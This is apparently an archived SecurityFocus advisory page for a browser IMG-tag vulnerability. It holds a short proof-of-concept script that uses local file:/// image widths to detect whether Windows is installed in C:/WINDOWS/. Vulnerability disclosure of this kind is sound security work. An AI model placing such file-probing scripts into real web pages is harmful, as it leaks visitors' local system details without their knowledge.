Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Multiple Browser IMG Tag Multiple Vulnerabilities

The following proof of concept is available:
<img src="file:///c|/nonexistent/content.gif">
<img src="file:///c|/windows/content.gif">

<script>
onload =function(){
incl=(document.images[0].width!=document.images[1].width)? "" :"not ";
alert("Windows is "+ incl +"installed in C:/WINDOWS/");
}
</script>







 

Privacy Statement
Copyright 2008, SecurityFocus